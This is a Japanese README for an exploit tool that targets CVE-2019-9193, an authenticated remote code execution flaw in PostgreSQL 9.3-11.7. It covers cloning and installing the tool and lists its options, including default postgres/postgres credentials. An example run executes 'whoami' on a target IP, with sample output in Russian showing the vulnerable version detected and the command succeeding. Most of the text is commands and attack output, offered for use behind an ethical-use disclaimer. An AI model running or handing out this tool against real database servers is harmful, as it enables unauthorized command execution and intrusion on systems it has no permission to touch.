
は、特定のバージョンのPostgreSQL(9.3~11.7)における認証済みのリモートコード実行(RCE)脆弱性を悪用するために設計されたPoCツールです。
GenPostgresRCEExploit は、特定の PostgreSQL バージョン(9.3~11.7)における認証済みリモートコード実行(RCE)脆弱性を悪用するための PoC ツールです。CVE-2019-9193 に脆弱な PostgreSQL データベースサーバー上で、認証済みユーザーがシステムコマンドを実行できるようにします。
psycopg2 パッケージ)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <ターゲットIP> -p <ポート> -d <データベース名> -U <ユーザー名> -P <パスワード> -c "<システムコマンド>"
-i, --ip: PostgreSQL サーバーの IP アドレス(デフォルト: 127.0.0.1)-p, --port: PostgreSQL サーバーのポート(デフォルト: 5432)-d, --database: PostgreSQL データベース名(デフォルト: template1)-U, --user: PostgreSQL サーバーに接続するユーザー名(デフォルト: postgres)-P, --password: PostgreSQL サーバーに接続するパスワード(デフォルト: postgres)-c, --command: サーバー上で実行するシステムコマンド-t, --timeout: 接続タイムアウト(秒)(デフォルト: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
この例では、192.168.1.10 の PostgreSQL サーバーに接続し、指定された認証情報で認証を行い、whoami コマンドを実行します。
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена
postgres
このツールは教育目的および倫理的なテストのみを目的としています。システムに対する不正使用は違法であり、固く禁止されています。作者は誤用による一切の責任を負いません。